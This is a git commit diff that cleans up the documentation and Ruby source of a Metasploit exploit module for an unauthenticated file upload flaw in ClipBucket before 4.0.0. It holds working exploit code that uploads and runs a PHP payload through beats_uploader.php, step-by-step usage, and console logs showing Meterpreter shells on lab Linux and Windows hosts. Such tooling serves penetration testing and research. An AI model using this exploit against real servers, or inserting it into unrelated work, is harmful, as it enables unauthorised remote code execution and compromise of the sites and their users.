documentation update

GSoC/Meterpreter_Web_Console
h00die 2018-03-24 19:25:59 -04:00
parent 230c0a295f
commit 0028e2c5ba
2 changed files with 40 additions and 46 deletions

View File

@ -1,26 +1,24 @@
## Description
A malicious file can be uploaded into the webserver by an unauthenticated attacker. It is possible for an attacker to upload
a malicious script file to issue operating system commands.
A malicious file can be uploaded by an unauthenticated attacker through the `actions/beats_uploader.php` script.
ClipBucket < 4.0.0 - Release 4902 is vulnerable. Additional information and vulnerabilities can be viewed on
Exploit-DB [44250](https://www.exploit-db.com/exploits/44250/)
## Vulnerable Application
According To publicly exploit Disclosure of ClipBucket < 4.0.0 - Release 4902
this application is vulnerable to Unauthenticated Arbitrary File Upload
read more : https://www.exploit-db.com/exploits/44250/
**Vulnerable Application Link**
https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
Available at [Exploit-DB](https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip)
## Vulnerable Application Installation Setup.
Download Application : ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```
## Vulnerable Application Installation
Unzip : ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```
Download Application: ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```
Move In WebDirectory : ```mv clipbucket-4881/upload/* /var/www/html/```
Unzip: ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```
Change Owner : ```chown -R www-data:www-data /var/www/html/```
Move In WebDirectory: ```mv clipbucket-4881/upload/* /var/www/html/```
**And Follow Clipbucket Installer**
Visit : http://localhost/
Change Owner: ```chown -R www-data:www-data /var/www/html/```
Follow Clipbucket Installer Instructions at: ```http://localhost/```
## Verification Steps
@ -30,14 +28,10 @@ Visit : http://localhost/
3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `check`
```
[*] 10.22.1.4:80 The target appears to be vulnerable.
```
7. Do: `set lport <port>`
8. Do: `set lhost <ip>`
9. Do: `exploit`
10. You should get a shell.
6. Do: `set lport <port>`
7. Do: `set lhost <ip>`
8. Do: `exploit`
9. You should get a shell.
## Options
@ -46,7 +40,9 @@ Visit : http://localhost/
TARGETURI by default is `/`, however it can be changed.
## Scenarios
**TESTED AGAINST LINUX**
### ClipBucket on Kali Linux
```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
@ -75,10 +71,9 @@ Computer : linux
OS : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter >
```
### ClipBucket on Windows 7
**TESTED AGAINST WINDOWS**
```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
@ -107,5 +102,4 @@ Computer : AGENT22-PC
OS : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >
```

View File

@ -12,10 +12,11 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
'Description' => %q{
This module exploits a vulnerability found in ClipBucket version Before than 4.0.0 (Release 4902).
A malicious file can be uploaded into the webserver using Unauthenticated Arbitrary File Upload attack.
This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).
A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.
It is possible for an attacker to upload a malicious script to issue operating system commands.
this issue caused by improper session handling in /action/beats uploader.php file. This module tested on ClipBucket before than 4.0.0 - Release 4902 in Windows7 and Kali Linux .
This issue is caused by improper session handling in /action/beats_uploader.php file.
This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.
},
'License' => MSF_LICENSE,
'Author' =>
@ -54,12 +55,12 @@ class MetasploitModule < Msf::Exploit::Remote
end
def check
vprint_status("Trying to detect ClipBucket on target.")
vprint_status('Trying to detect ClipBucket on target.')
# check for readme file
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "readme")
'uri' => normalize_uri(uri, 'readme')
})
unless res
@ -75,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
# check for beats_uploader.php file
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "actions", "beats_uploader.php")
'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php')
})
unless res
@ -100,16 +101,16 @@ class MetasploitModule < Msf::Exploit::Remote
# Setting POST data
post_data = Rex::MIME::Message.new
post_data.add_part(stager, content_type = "application/octet-stream", transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"pfile.php\"") # payload
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"plupload\"") # require for uploading
post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"name\"")
post_data.add_part(stager, content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = 'form-data; name="file"; filename="pfile.php"') # payload
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="plupload"') # require for uploading
post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="name"')
data = post_data.to_s
print_status("Uploading payload..")
print_status('Uploading payload..')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "actions", "beats_uploader.php"),
'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php'),
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
@ -121,14 +122,14 @@ class MetasploitModule < Msf::Exploit::Remote
unless res && res.code == 200 && jsonres['success'] == 'yes'
fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
end
print_good("Looking For Payload .... ")
print_good('Looking For Payload..')
pdir = jsonres['file_directory']
file_name = jsonres['file_name']
pext = jsonres['extension']
print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext} ")
print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext}")
# Payload name
pname = file_name + ".php"
pname = "#{file_name}.php"
# Cleanup is Good Idea .
register_files_for_cleanup(pname)
@ -136,14 +137,13 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "actions", pdir, pname)
'uri' => normalize_uri(uri, 'actions', pdir, pname)
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res && res.code != 200
print_error("Unexpected response, probably the exploit failed")
print_error('Unexpected response, probably the exploit failed')
end
end
end
end